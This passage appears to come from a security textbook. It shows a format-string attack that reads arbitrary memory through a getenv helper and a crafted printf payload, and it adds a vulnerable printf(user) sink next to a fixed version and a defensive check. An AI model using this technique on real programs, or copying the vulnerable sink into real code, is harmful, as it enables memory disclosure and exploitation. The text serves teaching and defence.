Reading Arbitrary Memory
So how do we read from arbitrary memory locations? Simple: we supply valid addresses
within the segment of the current process. We will use the following helper program to
assist us in finding a valid address:
$ cat getenv.c
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]){
    char *addr; // pointer to the value of the requested environment variable
    if (argc < 2) { // require the variable name on the command line
        fprintf(stderr, "usage: %s VARNAME\n", argv[0]);
        return 1;
    }
    addr = getenv(argv[1]); // look up the variable in the process environment
    printf("%s is located at %p\n", argv[1], addr); // display its address
    return 0;
}
$ gcc -o getenv getenv.c
The purpose of this program is to fetch the location of environment variables from
the system. To test this program, let's check for the location of the SHELL variable, which
stores the location of the current user's shell:
$ ./getenv SHELL
SHELL is located at 0xbffffd84
Now that we have a valid memory address, let's try it. First, remember to reverse the
byte order of the memory location because this system is little-endian:
$ ./fmtstr `printf "\x84\xfd\xff\xbf"`" %08x %08x %08x %s"
[4 raw address bytes] bffffd2f 00000648 00000774 /bin/bash
Canary at 0x08049440 = 0x00000000
Success! We were able to read up to the first NULL character of the address given (the
SHELL environment variable). Take a moment to play with this now and check out
other environment variables.
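The read above works only because fmtstr hands user input to printf as the format string itself. As an added example (not code from the book), the sink that causes this is shown beside its fix and a defensive check; the function names echo_vulnerable, echo_fixed and has_conversion are this example's own.

```c
/* Added example, not from the original text: the format-string sink and its fix. */
#include <stdio.h>
#include <string.h>

/* The bug: attacker-supplied text becomes the format string, so "%08x %08x %s"
   walks the stack exactly as shown above. Kept here for contrast only. */
void echo_vulnerable(const char *user) {
    printf(user);
    putchar('\n');
}

/* The fix: a literal format string; user text is only ever an argument.
   Returns the number of characters that would be written, like snprintf. */
int echo_fixed(char *out, size_t outlen, const char *user) {
    return snprintf(out, outlen, "%s", user);
}

/* Defensive check for legacy paths that cannot be changed yet: does the
   string contain a real conversion, i.e. a '%' not escaped as "%%"? */
int has_conversion(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; } /* "%%" just prints a '%' */
        return 1;
    }
    return 0;
}

int main(void) {
    char buf[64];
    const char *in = "%08x %08x %08x %s"; /* constructed sample input */
    echo_fixed(buf, sizeof buf, in);
    printf("fixed output: %s\n", buf);    /* the directives are printed verbatim */
    printf("has_conversion: %d\n", has_conversion(in));
    return 0;
}
```

Compilers flag the vulnerable form with -Wformat-security, which is worth turning into an error in any build that handles untrusted input.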